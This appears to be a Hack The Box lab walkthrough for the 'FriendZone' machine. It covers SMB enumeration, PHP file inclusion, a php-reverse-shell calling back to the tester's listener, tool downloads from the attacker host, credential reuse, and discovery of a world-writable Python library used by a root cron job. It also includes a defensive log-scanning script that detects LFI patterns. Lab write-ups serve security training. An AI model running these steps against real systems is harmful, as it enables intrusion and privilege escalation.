    \\10.10.10.123\print$                    Printer Drivers
    \\10.10.10.123\print$                    Disk Drivers
    \\10.10.10.123\Files                     FriendZone Samba Server Files /etc/Files
    \\10.10.10.123\general                   FriendZone Samba Server Files
    \\10.10.10.123\Development               FriendZone Samba Server Files
    \\10.10.10.123\IPC$

[*] Enumerating: \\10.10.10.123\general
    .                                   D        0  Wed Jan 16 15:10:51 2019
    ..                                  D        0  Wed Jan 23 16:51:02 2019
    creds.txt                           N       57  Tue Oct  9 19:52:42 2018

[*] Enumerating: \\10.10.10.123\Development
    .                                   D        0  Tue Feb 18 10:15:13 2020
    ..                                  D        0  Wed Jan 23 16:51:02 2019

[*] Enumerating Domain Information for: 10.10.10.123
    [+] Domain Name: WORKGROUP
    [+] Domain SID: (NULL SID)
[*] Enumerating querydispinfo for: 10.10.10.123
[*] Enumerating enumdomusers for: 10.10.10.123
[*] Enumerating LSA for: 10.10.10.123
[*] Performing RID Cycling for: 10.10.10.123
[*] Testing 10.10.10.123 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.123
[*] 0 unique user(s) identified
Get creds.txt file
root@kali:~/HTB/Machines/FriendZone# smbclient \\\\10.10.10.123\\general
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jan 16 15:10:51 2019
  ..                                  D        0  Wed Jan 23 16:51:02 2019
  creds.txt                           N       57  Tue Oct  9 19:52:42 2018

        9221460 blocks of size 1024. 6423220 blocks available
smb: \> get creds.txt
smb: \> quit
root@kali:~/HTB/Machines/FriendZone# cat creds.txt
creds for the admin THING:

admin:WORKWORKHhallelujah@#

We have found a set of credentials.
Port 443
Several hostnames have been enumerated:
- friendzone.red
- administrator1.friendzone.red
- hr.friendzone.red
- uploads.friendzone.red
- friendzoneportal.red
- admin.friendzoneportal.red
- files.friendzoneportal.red
- imports.friendzoneportal.red
- vpn.friendzoneportal.red
friendzone.red
u505@kali:~/HTB/Machines/FriendZone$ curl -k https://friendzone.red
<title>FriendZone escape software</title>

<center><h2>Ready to escape from friend zone !</h2></center>

<center><img src="e.gif"></center>

<!-- Just doing some development here -->

<!-- /js/js -->

<!-- Don't go deep ;) -->

There is a hint pointing to /js/js:

u505@kali:~/HTB/Machines/FriendZone$ curl -k https://friendzone.red/js/js/
<p>Testing some functions !</p><p>I'am trying not to break things !</p>WVRBbEZJUmN3RDE1ODIwNDA3ODFGR2lxZ0JmYW5p<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->
u505@kali:~/HTB/Machines/FriendZone$ curl -k https://friendzone.red/js/js/
<p>Testing some functions !</p><p>I'am trying not to break things !</p>VnZuekdsMDdPQTE1ODIwNDA3ODYxaVdMd1FqeXQw<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->

But the text changes on every request, and base64-decoding it does not give us anything useful: it is just random characters wrapped around a Unix timestamp (1582040781 in the first response), matching the "times and zones" comment.
u505@kali:~/HTB/Machines/FriendZone$ /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 50 -u https://friendzone.red/

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt | HTTP method: get | Threads: 50 | Wordlist size: 9221

Error Log: /opt/utils/dirsearch/logs/errors-20-02-18_10-51-09.log

Target: https://friendzone.red/

[10:51:09] Starting:
[10:51:11] 200 -  742B - /admin/
[10:51:13] 403 -  303B - /.htpasswd.txt
[10:51:23] 403 -  296B - /icons/
[10:51:24] 200 -  922B - /js/
[10:51:33] 403 -  304B - /server-status/

Task Completed

The admin folder is empty.
administrator1.friendzone.red
We log in with the credentials found on the network share and then visit dashboard.php.
The page tells us to add parameters and gives an example: image_id=a.jpg&pagename=timestamp
The pagename parameter suggests the page is vulnerable to a PHP local file inclusion (LFI).
We try the following URL: https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=timestamp
As expected, it returns a base64 line.
u505@kali:~/HTB/Machines/FriendZone$ echo -n "PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo=" | base64 -d
<?php


$time_final = time() + 3600;

echo "Final Access timestamp is $time_final";


?>
We do the same with dashboard:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard

u505@kali:~/HTB/Machines/FriendZone$ echo -n "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" | base64 -d
<?php

//echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
//echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
echo "<title>FriendZone Admin !</title>";
$auth = $_COOKIE["FriendZoneAuth"];

if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
 echo "<br><br><br>";

 echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
 echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";

 if(!isset($_GET["image_id"])){
   echo "<br><br>";
   echo "<center><p>image_name param is missed !</p></center>";
   echo "<center><p>please enter it to show the image</p></center>";
   echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
 }else{
   $image = $_GET["image_id"];
   echo "<center><img src='images/$image'></center>";

   echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
   include($_GET["pagename"].".php");
   //echo $_GET["pagename"];
 }
}else{
 echo "<center><p>You can't see the content ! , please login !</center></p>";
}
?>
We can pass the cookie to curl and include a PHP page, in this case timestamp:

u505@kali:~/HTB/Machines/FriendZone$ curl --cookie "FriendZoneAuth=e7749d0f4b4da5d03e6e9196fd1d18f1" -k https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg\&pagename=timestamp
<title>FriendZone Admin !</title><br><br><br><center><h2>Smart photo script for friendzone corp !</h2></center><center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center><center><img src='images/a.jpg'></center><center><h1>Something went worng ! , the script include wrong param !</h1></center>Final Access timestamp is 1582074462
The Development share maps to /etc/Development on the server, as seen in the nmap share enumeration. We upload a phpinfo file to test whether files on the share get executed through the include.

u505@kali:~/HTB/Machines/FriendZone$ cat phpinfo.php
<?php phpinfo(); ?>
u505@kali:~/HTB/Machines/FriendZone$ smbclient //friendzone/Development
Enter WORKGROUP\u505's password:
Try "help" to get a list of possible commands.
smb: \> put phpinfo.php
putting file phpinfo.php as \phpinfo.php (0.2 kb/s) (average 0.2 kb/s)
smb: \> quit
If we open
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/phpinfo
we see the output of our phpinfo.php: files dropped on the writable share are executed by the include.
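From the defender's side, every request in this section leaves a trace in the web server log, and the include() line above tells us exactly what to look for: pagename is only ever meant to be a bare page name, so a stream wrapper, an absolute path or a ../ sequence in it is an attack. As an added example (not code from the original writeup), the script below parses Apache combined-format lines and flags such values; the log lines are constructed from the requests made above.

```python
"""Detect file-inclusion attempts against dashboard.php in Apache access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log in Apache combined format, modelled on the requests above.
SAMPLE_LOG = """\
10.10.14.26 - - [18/Feb/2020:16:21:14 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 523 "-" "curl/7.68.0"
10.10.14.26 - - [18/Feb/2020:16:25:02 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard HTTP/1.1" 200 1998 "-" "curl/7.68.0"
10.10.14.26 - - [18/Feb/2020:16:40:11 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/phpinfo HTTP/1.1" 200 80210 "-" "Mozilla/5.0"
10.10.14.26 - - [18/Feb/2020:16:41:31 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.10.14.26 - - [18/Feb/2020:16:42:00 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=../../../../etc/passwd HTTP/1.1" 200 0 "-" "curl/7.68.0"
"""

# Apache combined log format: client, identd, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Query parameters that this application feeds into include(); only pagename here.
INCLUDE_PARAMS = ("pagename",)
# PHP stream wrappers that must never appear in an include path.
STREAM_WRAPPERS = ("php://", "data:", "expect://", "phar://", "zip://",
                   "file://", "http://", "https://", "ftp://")


def classify_include(value: str):
    """Return why an include parameter value is suspicious, or None for a plain page name."""
    v = value.strip().lower()
    if v.startswith(STREAM_WRAPPERS):
        return "stream wrapper in include parameter"
    if "\x00" in v:
        return "null byte in include parameter"
    if "../" in v or "..\\" in v:
        return "directory traversal in include parameter"
    if v.startswith(("/", "\\")) or re.match(r"^[a-z]:[\\/]", v):
        return "absolute path in include parameter"
    return None


def scan_log(lines):
    """Return (client_ip, timestamp, parameter value, reason) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line (blank, truncated, error log, ...)
        query = urlsplit(m.group("target")).query
        params = parse_qs(query, keep_blank_values=True)
        for name in INCLUDE_PARAMS:
            for value in params.get(name, []):
                reason = classify_include(value)
                if reason:
                    hits.append((m.group("ip"), m.group("time"), value, reason))
    return hits


if __name__ == "__main__":
    for ip, when, value, reason in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{when}  {ip}  {reason}: pagename={value}")
```

Server-side, the same classification becomes the fix: resolve pagename against an allowlist of known page names and refuse anything else before it reaches include().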
User flag
Since we can execute a PHP file of our choosing, we can get a reverse shell.
Create reverse shell file
u505@kali:~/HTB/Machines/FriendZone$ cp /usr/share/webshells/php/php-reverse-shell.php ./
u505@kali:~/HTB/Machines/FriendZone$ vi php-reverse-shell.php
u505@kali:~/HTB/Machines/FriendZone$ cat php-reverse-shell.php | grep CHANGE
$ip = '10.10.14.26';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
Push reverse shell to server
u505@kali:~/HTB/Machines/FriendZone$ smbclient //friendzone/Development
Enter WORKGROUP\u505's password:
Try "help" to get a list of possible commands.
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (45.8 kb/s) (average 45.8 kb/s)
smb: \> quit
Raise listener
u505@kali:~/HTB/Machines/FriendZone$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Call script and open reverse shell
u505@kali:~/HTB/Machines/FriendZone$ curl --cookie "FriendZoneAuth=e7749d0f4b4da5d03e6e9196fd1d18f1" -k https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg\&pagename=/etc/Development/php-reverse-shell
The listener receives the connection as www-data, and we upgrade it to a proper pty:
u505@kali:~/HTB/Machines/FriendZone$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.123.
Ncat: Connection from 10.10.10.123:34844.
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 04:05:57 up 12:03,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@FriendZone:/$ stty raw -echo
stty raw -echo
www-data@FriendZone:/$ export TERM=screen
Flag
www-data@FriendZone:/$ cat /home/friend/user.txt <USER_FLAG>
Escalation of privileges
Database access
www-data@FriendZone:/var/www$ ls -ltr
total 28
drwxr-xr-x 3 root root 4096 Oct 6 2018 uploads
drwxr-xr-x 4 root root 4096 Oct 6 2018 friendzone
drwxr-xr-x 2 root root 4096 Oct 6 2018 friendzoneportal
drwxr-xr-x 3 root root 4096 Oct 6 2018 html
-rw-r--r-- 1 root root 116 Oct 6 2018 mysql_data.conf
drwxr-xr-x 2 root root 4096 Jan 15 2019 friendzoneportaladmin
drwxr-xr-x 3 root root 4096 Jan 16 2019 admin
We check the mysql file
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend

db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
The database password is worth trying against SSH as well, since there is a local user named friend. The credentials are reused, and we get a shell as friend:
u505@kali:~/HTB/Machines/FriendZone/www$ ssh friend@friendzone
The authenticity of host 'friendzone (10.10.10.123)' can't be established.
ECDSA key fingerprint is SHA256:/CZVUU5zAwPEcbKUWZ5tCtCrEemowPRMQo5yRXTWxgw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'friendzone,10.10.10.123' (ECDSA) to the list of known hosts.
friend@friendzone's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
But this user does not give us more access than www-data had, so we continue with local enumeration.
Local enumeration
u505@kali:~/HTB/Machines/FriendZone$ mkdir www
u505@kali:~/HTB/Machines/FriendZone$ cd www/
u505@kali:~/HTB/Machines/FriendZone/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/FriendZone/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/FriendZone/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
From the target
www-data@FriendZone:/$ cd /tmp
www-data@FriendZone:/tmp$ wget -q http://10.10.14.26/LinEnum.sh
www-data@FriendZone:/tmp$ wget -q http://10.10.14.26/pspy64
www-data@FriendZone:/tmp$ chmod +x LinEnum.sh pspy64
Crontab job
pspy catches a cron job that runs as root (UID=0):
2020/02/19 14:26:01 CMD: UID=0 PID=17082 | /usr/bin/python /opt/server_admin/reporter.py
2020/02/19 14:26:01 CMD: UID=0 PID=17081 | /bin/sh -c /opt/server_admin/reporter.py
2020/02/19 14:26:01 CMD: UID=0 PID=17080 | /usr/sbin/CRON -f
reporter.py is owned by root and only writable by its owner (-rwxr--r--), so we cannot modify the script itself.
www-data@FriendZone:/tmp$ ls -l /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16 2019 /opt/server_admin/reporter.py
The source file
www-data@FriendZone:/tmp$ cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"
#os.system(command)

# I need to edit the script later
# Sam ~ python developer
The script only imports the os module and prints a line; the rest is commented out and unusable. There is nothing to inject into here, but the import matters: whatever Python loads to satisfy "import os" runs as root every time cron fires.
We run pspy with file-system events (-f) and process events (-p) enabled to see exactly which files the job opens.
www-data@FriendZone:/tmp$ ./pspy64 -fp
...
2020/02/19 14:32:01 FS: OPEN | /usr/bin/python2.7
2020/02/19 14:32:01 FS: ACCESS | /usr/bin/python2.7
2020/02/19 14:32:01 CMD: UID=0 PID=17109 | /usr/bin/python /opt/server_admin/reporter.py
2020/02/19 14:32:01 CMD: UID=0 PID=17108 | /bin/sh -c /opt/server_admin/reporter.py
2020/02/19 14:32:01 CMD: UID=0 PID=17107 | /usr/sbin/CRON -f
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/site.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/site.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/site.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/site.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/os.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/os.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/os.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/os.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/posixpath.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/posixpath.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/posixpath.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/posixpath.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/stat.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/stat.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/stat.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/stat.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/stat.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/genericpath.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/genericpath.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/genericpath.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/genericpath.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/genericpath.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/warnings.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/warnings.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/warnings.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/warnings.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/linecache.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/linecache.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/linecache.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/linecache.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/linecache.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/types.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/types.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/types.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/types.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/types.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/warnings.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/posixpath.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/UserDict.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/UserDict.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/UserDict.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/UserDict.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_abcoll.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_abcoll.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/_abcoll.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_abcoll.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/abc.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/abc.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/abc.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/abc.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_weakrefset.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_weakrefset.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/_weakrefset.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_weakrefset.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_weakrefset.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/abc.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_abcoll.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/UserDict.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/copy_reg.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/copy_reg.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/copy_reg.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/copy_reg.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/copy_reg.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/os.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/traceback.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/traceback.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/traceback.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/traceback.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/traceback.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sysconfig.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sysconfig.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/sysconfig.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sysconfig.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sysconfig.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/re.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/re.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/re.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/re.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_compile.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_compile.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/sre_compile.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_compile.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_parse.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_parse.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/sre_parse.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_parse.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_constants.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_constants.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/sre_constants.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_constants.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_constants.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_parse.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_compile.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/re.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_sysconfigdata.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_sysconfigdata.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/_sysconfigdata.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_sysconfigdata.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_sysconfigdata.py
2020/02/19 14:32:01 FS: OPEN DIR | /usr/local/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: OPEN DIR | /usr/local/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/local/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/local/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/local/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/local/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: CLOSE_NOWRITE DIR | /usr/local/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: CLOSE_NOWRITE DIR | /usr/local/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: OPEN DIR | /usr/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: OPEN DIR | /usr/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: CLOSE_NOWRITE DIR | /usr/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: CLOSE_NOWRITE DIR | /usr/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sitecustomize.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/sitecustomize.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sitecustomize.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/site.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/locale/locale-archive
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/__init__.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/__init__.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/encodings/__init__.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/__init__.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/codecs.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/codecs.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/codecs.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/codecs.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/codecs.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/aliases.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/aliases.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/encodings/aliases.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/aliases.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/aliases.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/__init__.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/utf_8.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/utf_8.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/encodings/utf_8.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/utf_8.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/utf_8.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/bin/python2.7
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/locale/locale-archive
Among the files the job reads, the Python os library stands out: it is world-writable (-rwxrwxrwx), so any local user can modify it.
www-data@FriendZone:/tmp$ ls -l /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
